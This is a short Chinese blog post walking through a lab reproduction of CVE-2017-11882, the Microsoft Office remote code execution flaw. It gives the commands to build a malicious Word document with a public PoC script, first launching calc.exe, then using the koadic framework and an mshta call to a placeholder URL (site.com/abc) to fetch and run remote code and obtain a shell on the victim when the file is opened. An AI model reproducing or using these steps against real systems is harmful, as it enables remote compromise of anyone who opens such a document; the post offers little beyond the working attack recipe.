Fidcer'Blog

CVE-2017-11882复现

字数统计: 215阅读时长: 1 min
2019/02/21 Share
漏洞环境

攻击机:kali linux
靶机:windows 7 旗舰版
工具及说明


CVE-2017-11882漏洞利用复现
2017年11月14日微软发布了潜伏17年之久的office远程代码执行漏洞(cve-2017-11882)。该漏洞为office内存破坏漏洞,影响目前流行的office版本。
首先到github上下载一个poc
原脚本来自于

1
我们下载这个 ```https://github.com/iBearcat/CVE-2017-11882

利用方法

1
第一步::python Command_CVE-2017-11882.py -c “cmd.exe /c calc.exe” -o test.doc

10fb1511876761.png
如果成功的话是这样的

现在我们反弹shell

1
2
3
下载koadic
安装 git clone https://github.com/zerosum0x0/koadic.git
使用 ./koadic

09dd1511876776.png
设置LHOST 端口默认9999我们不变
82661511876798.png
这里可能有utf-8的报错解决方法如下
602e1511876855.png
wq保存

1
方法:python Command_CVE-2017-11882.py -c “mshta http://site.com/abc“ -o test.doc

7afb1511876876.png
打开word 拿到权限
586e1511876901.png

结束

CATALOG
  1. 1. 利用方法